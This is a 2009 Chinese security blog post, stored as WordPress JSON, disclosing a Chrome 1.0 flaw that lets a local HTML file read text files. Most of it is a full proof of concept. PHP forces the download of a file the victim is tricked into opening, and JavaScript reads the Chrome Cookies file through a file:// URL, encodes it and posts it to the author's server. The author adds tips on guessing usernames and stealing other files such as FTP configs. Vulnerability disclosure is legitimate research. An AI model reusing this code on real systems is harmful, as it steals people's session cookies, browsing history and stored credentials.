{"id":151,"date":"2009-04-22T10:38:58","date_gmt":"2009-04-22T10:38:58","guid":{"rendered":""},"modified":"2011-04-25T08:38:00","modified_gmt":"2011-04-25T08:38:00","slug":"google-chrome%e4%bd%bf%e7%94%a8ajax%e8%af%bb%e5%8f%96%e6%9c%ac%e5%9c%b0%e6%96%87%e4%bb%b6%e6%bc%8f%e6%b4%9e","status":"publish","type":"post","link":"https:\/\/www.inbreak.net\/archives\/151.html","title":{"rendered":"Google Chrome\u4f7f\u7528ajax\u8bfb\u53d6\u672c\u5730\u6587\u4ef6\u6f0f\u6d1e"},"content":{"rendered":"

by \u7a7a\u865a\u6d6a\u5b50\u5fc3<\/p>\n

google\u7684\u6d4f\u89c8\u5668Chrome1.0.154.53\uff08\u76ee\u524d\u6700\u65b0\uff09\uff0c\u5b58\u5728ajax\u8bfb\u53d6\u672c\u5730\u6587\u4ef6\u6f0f\u6d1e\u3002<\/p>\n

\u5229\u7528\u8be5\u6f0f\u6d1e\u53ef\u4ee5\u8bfb\u53d6\u672c\u5730\u6587\u672c\u6587\u4ef6\uff0c\u5e76\u63d0\u4ea4\u51fa\u6765\u3002<\/p>\n

\u800cChrome\u7684cookie\u9ed8\u8ba4\u4fdd\u5b58\u5728“C:\\Documents and Settings\\administrator\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Cookies”<\/p>\n

Chrome\u7684\u5386\u53f2\u4fdd\u5b58\u5728"C:\\Documents and Settings\\administrator\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\History"<\/p>\n

\u8bfb\u53d6\u8fd9\u4e2a\u6587\u4ef6\uff0c\u7136\u540e\u63d0\u4ea4\uff0c\u524d\u63d0\u662f\u6587\u4ef6\u5728\u672c\u5730\u6253\u5f00\uff0c\u4f46\u662f\u5982\u4f55\u6b3a\u9a97\u7528\u6237\u5728\u672c\u5730\u6253\u5f00\u5462\uff1f<\/p>\n

\u770b\u4ee3\u7801\uff1a<\/p>\n

 <\/p>\n

\n
PHP\u4ee3\u7801<\/div>\n
    \n
  1. <?   <\/span><\/span><\/li>\n
  2. \/* <\/span> <\/li>\n
  3. #     Chrome 1.0.154.53 use ajax read local txt file and upload exp <\/span> <\/span><\/li>\n
  4. #     inbreak.net  <\/span> <\/span><\/li>\n
  5. #     author voidloafer@gmail.com 2009-4-22   <\/span> <\/span><\/li>\n
  6. #     http:\/\/inbreak.net\/kxlzxtest\/testxss\/a.php get cookie and save. <\/span> <\/span><\/li>\n
  7. *\/<\/span>  <\/span><\/span><\/li>\n
  8. header(<\/span>"Content-Disposition: attachment;filename=kxlzx.htm"<\/span>);   <\/span><\/li>\n
  9. header(<\/span>"Content-type: application\/kxlzx"<\/span>);   <\/span><\/li>\n
  10. \/* <\/span> <\/li>\n
  11. #     set header, so just download html file,and open it at local. <\/span> <\/span><\/li>\n
  12. *\/<\/span>  <\/span><\/span><\/li>\n
  13. ?>   <\/span><\/li>\n
  14. <form id=<\/span>"form"<\/span> action=<\/span>"http:\/\/inbreak.net\/kxlzxtest\/testxss\/a.php"<\/span> method=<\/span>"POST"<\/span>>   <\/span><\/li>\n
  15.     <input id=<\/span>"input"<\/span> name=<\/span>"cookie"<\/span> value=<\/span>""<\/span> type=<\/span>"hidden"<\/span>>   <\/span><\/li>\n
  16. <\/form>   <\/span><\/li>\n
  17. <script>   <\/span><\/li>\n
  18. function<\/span> doMyAjax(user)   <\/span><\/li>\n
  19. {   <\/span><\/li>\n
  20.         <\/span>var<\/span> time = Math.random();   <\/span><\/li>\n
  21. \/* <\/span> <\/li>\n
  22. the cookie at C:\\Documents and Settings\\kxlzx\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default <\/span> <\/span><\/li>\n
  23. and the history at C:\\Documents and Settings\\kxlzx\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\History <\/span> <\/span><\/li>\n
  24. and so on… <\/span> <\/span><\/li>\n
  25. *\/<\/span>  <\/span><\/span><\/li>\n
  26.         <\/span>var<\/span> strPer = <\/span>‘file:\/\/localhost\/C:\/Documents and Settings\/’<\/span>+user+<\/span>‘\/Local Settings\/Application Data\/Google\/Chrome\/User Data\/Default\/Cookies?time=’<\/span>+time;   <\/span><\/li>\n
  27.            <\/span><\/li>\n
  28.         startRequest(strPer);   <\/span><\/li>\n
  29.        <\/span><\/li>\n
  30. }   <\/span><\/li>\n
  31.   <\/span><\/li>\n
  32. function<\/span> Enshellcode(txt)   <\/span><\/li>\n
  33. {   <\/span><\/li>\n
  34. var<\/span> url=<\/span>new<\/span> String(txt);   <\/span><\/li>\n
  35. var<\/span> i=0,l=0,k=0,curl=<\/span>""<\/span>;   <\/span><\/li>\n
  36. l= url.length;   <\/span><\/li>\n
  37. for<\/span>(;i<l;i++){   <\/span><\/li>\n
  38. k=url.charCodeAt(i);   <\/span><\/li>\n
  39. if<\/span>(k<16)curl+=<\/span>"0"<\/span>+k.toString(16);<\/span>else<\/span> curl+=k.toString(16);}   <\/span><\/li>\n
  40. if<\/span> (l%2){curl+=<\/span>"00"<\/span>;}<\/span>else<\/span>{curl+=<\/span>"0000"<\/span>;}   <\/span><\/li>\n
  41. curl=curl.replace(\/(..)(..)\/g,<\/span>"%u$2$1"<\/span>);   <\/span><\/li>\n
  42. return<\/span> curl;   <\/span><\/li>\n
  43. }   <\/span><\/li>\n
  44.   <\/span><\/li>\n
  45.   <\/span><\/li>\n
  46. var<\/span> xmlHttp;   <\/span><\/li>\n
  47. function<\/span> createXMLHttp(){   <\/span><\/li>\n
  48.     <\/span>if<\/span>(window.XMLHttpRequest){   <\/span><\/li>\n
  49.         xmlHttp = <\/span>new<\/span> XMLHttpRequest();           <\/span><\/li>\n
  50.     }   <\/span><\/li>\n
  51.     <\/span>else<\/span> <\/span>if<\/span>(window.ActiveXObject){   <\/span><\/li>\n
  52.         xmlHttp = <\/span>new<\/span> ActiveXObject(<\/span>"Microsoft.XMLHTTP"<\/span>);   <\/span><\/li>\n
  53.     }   <\/span><\/li>\n
  54. }   <\/span><\/li>\n
  55.   <\/span><\/li>\n
  56. function<\/span> startRequest(doUrl){   <\/span><\/li>\n
  57.            <\/span><\/li>\n
  58.     createXMLHttp();   <\/span><\/li>\n
  59.        <\/span><\/li>\n
  60.     xmlHttp.onreadystatechange = handleStateChange;   <\/span><\/li>\n
  61.        <\/span><\/li>\n
  62.     xmlHttp.open(<\/span>"GET"<\/span>, doUrl, true);   <\/span><\/li>\n
  63.        <\/span><\/li>\n
  64.     xmlHttp.send(null);   <\/span><\/li>\n
  65.        <\/span><\/li>\n
  66.        <\/span><\/li>\n
  67. }    <\/span><\/li>\n
  68.   <\/span><\/li>\n
  69. function<\/span> handleStateChange(){   <\/span><\/li>\n
  70.     <\/span>if<\/span> (xmlHttp.readyState == 4 ){   <\/span><\/li>\n
  71.             <\/span>var<\/span> strResponse = <\/span>""<\/span>;   <\/span><\/li>\n
  72.             setTimeout(<\/span>"framekxlzxPost(xmlHttp.responseText)"<\/span>, 3000);    <\/span><\/li>\n
  73.                <\/span><\/li>\n
  74.     }   <\/span><\/li>\n
  75. }   <\/span><\/li>\n
  76.   <\/span><\/li>\n
  77.   <\/span><\/li>\n
  78. function<\/span> framekxlzxPost(text)   <\/span><\/li>\n
  79. {   <\/span><\/li>\n
  80.     document.getElementById(<\/span>"input"<\/span>).value = Enshellcode(text);   <\/span><\/li>\n
  81.     document.getElementById(<\/span>"form"<\/span>).submit();   <\/span><\/li>\n
  82. }   <\/span><\/li>\n
  83.   <\/span><\/li>\n
  84. doMyAjax(<\/span>"administrator"<\/span>);   <\/span><\/li>\n
  85.   <\/span><\/li>\n
  86. <\/script>  <\/span><\/li>\n<\/ol>\n<\/div>\n

    \u6ce8\u610f\uff0c\u672c\u4ee3\u7801\u4e0a\u4f20TXT\u4e4b\u524d\uff0c\u5df2\u7ecf\u505a\u4e86\u52a0\u5bc6\uff0c\u4e3a\u4e86\u4fdd\u8bc1\u6587\u4ef6\u7684\u5b8c\u6574\u6027\uff0c\u5177\u4f53\u7684\u89e3\u5bc6\uff0c\u8bf7\u770b<\/p>\n

    http:\/\/cha88.cn\/safe\/glacierlk.php<\/a><\/p>\n

    \u9009\u62e9shellcode\u89e3\u5bc6<\/p>\n

     <\/p>\n

    \u6d4f\u89c8\u5668\u4f1a\u81ea\u52a8\u4e0b\u8f7d\u8fd9\u4e2ahtml\u6587\u4ef6\uff0c\u4fdd\u5b58\u4e3akxlzx.htm\u3002<\/p>\n

    \"1.jpg\"<\/a><\/p>\n

    \u4e0b\u8f7d\u540e\uff0c\u7528\u6237\u80af\u5b9a\u4f1a\u53bb\u770b\u770b\u4e0b\u8f7d\u4e86\u4ec0\u4e48\uff0c\u6253\u5f00htm\uff08\u5728\u672c\u5730\uff09\u3002<\/p>\n

    \u6253\u5f00\u540e\uff0c\u6267\u884cJS\uff0c\u628a\u672c\u5730\u7684cookie\uff0chistory\u7b49\uff08\u53ef\u81ea\u5b9a\u4e49\uff09\uff0c\u4e0a\u4f20\u5230\u6076\u610f\u7528\u6237\u6307\u5b9a\u7684\u5730\u65b9\u3002<\/p>\n

    POC\u53ef\u4ee5\u6839\u636e\u5b9e\u9645\u60c5\u51b5\u6539\u8fdb\u3002\u6709\u4ee5\u4e0b\u51e0\u70b9\u6ce8\u610f\uff1a<\/p>\n

    \u51e0\u70b9\u8bf4\u660e\uff1a
    \n1\uff0c\u4e0d\u4e00\u5b9a\u975e\u8981\u8bfb\u53d6cookie\uff0c\u4f60\u4e5f\u53ef\u4ee5\u8bfb\u53d6\u5176\u4ed6\u4e1c\u897f\uff0c\u6bd4\u5982ftp\u8f6f\u4ef6\u7684ini\u914d\u7f6e\u6587\u4ef6\u7b49\uff0c\u53ea\u8981\u662ftxt\u5c31\u80fd\u8bfb\u53d6\u3002
    \n2\uff0c\u8bfb\u53d6cookie\u5fc5\u987b\u9884\u6d4b\u672c\u5730\u7528\u6237\u540d\uff0c\u4e0d\u8fc7\u5f88\u591a\u4eba\u90fd\u662fadministrator\u3002
    \n3\uff0c\u53cd\u6b63ajax\u662f\u5f02\u6b65\uff0c\u4f60\u53ef\u4ee5\u540c\u65f6\u8c03\u7528\u51e0\u4e2a\u65b9\u6cd5\u3002
    \n4\uff0c\u6216\u8005\u4f60\u53ef\u4ee5\u53d1\u9001\u4efb\u4f55\u60f3\u8981\u7684\u672c\u5730TXT\u6587\u4ef6\u3002<\/p>\n

    \u5176\u5b9e\u8fd9\u4e2a\u6f0f\u6d1e\u548c\u6211\u4ee5\u524d\u53d1\u7684opera\u672c\u5730\u8bfb\u53d6\u6f0f\u6d1e\u662f\u4e00\u4e2a\u9053\u7406\u7684\u3002<\/p>\n

    \u4f46\u662f\u4f1a\u6bd4\u5b83\u4e25\u91cd\u4e00\u70b9\uff0c\u56e0\u4e3aChrome\u7684cookie\u6587\u4ef6\u5730\u5740\u662f\u56fa\u5b9a\u7684\u3002<\/strong><\/p>\n

    POC:<\/strong><\/p>\n

     http:\/\/inbreak.net\/kxlzxtest\/testxss\/Chrome.php<\/font><\/a><\/p>\n

    http:\/\/inbreak.net\/kxlzxtest\/testxss\/b.php<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"

    google\u7684\u6d4f\u89c8\u5668Chrome1.0.154.53\uff08\u76ee\u524d\u6700\u65b0\uff09\uff0c\u5b58\u5728ajax\u8bfb\u53d6\u672c\u5730\u6587\u4ef6\u6f0f\u6d1e\u3002<\/p>\n

    \u5229\u7528\u8be5\u6f0f\u6d1e\u53ef\u4ee5\u8bfb\u53d6\u672c\u5730\u6587\u672c\u6587\u4ef6\uff0c\u5e76\u63d0\u4ea4\u51fa\u6765\u3002<\/p>\n

    \u800cChrome\u7684cookie\u9ed8\u8ba4\u4fdd\u5b58\u5728“C:\\Documents and Settings\\administrator\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Cookies”<\/p>\n

    Chrome\u7684\u5386\u53f2\u4fdd\u5b58\u5728"C:\\Documents and Settings\\administrator\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\History"<\/p>\n

    \u8bfb\u53d6\u8fd9\u4e2a\u6587\u4ef6\uff0c\u7136\u540e\u63d0\u4ea4\uff0c\u524d\u63d0\u662f\u6587\u4ef6\u5728\u672c\u5730\u6253\u5f00\uff0c\u4f46\u662f\u5982\u4f55\u6b3a\u9a97\u7528\u6237\u5728\u672c\u5730\u6253\u5f00\u5462\uff1f<\/p>\n

    \u7ee7\u7eed\u9605\u8bfb »<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[86,5],"tags":[47,46,22],"views":8034,"_links":{"self":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/151"}],"collection":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/comments?post=151"}],"version-history":[{"count":1,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/151\/revisions"}],"predecessor-version":[{"id":229,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/151\/revisions\/229"}],"wp:attachment":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/media?parent=151"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/categories?post=151"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/tags?post=151"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}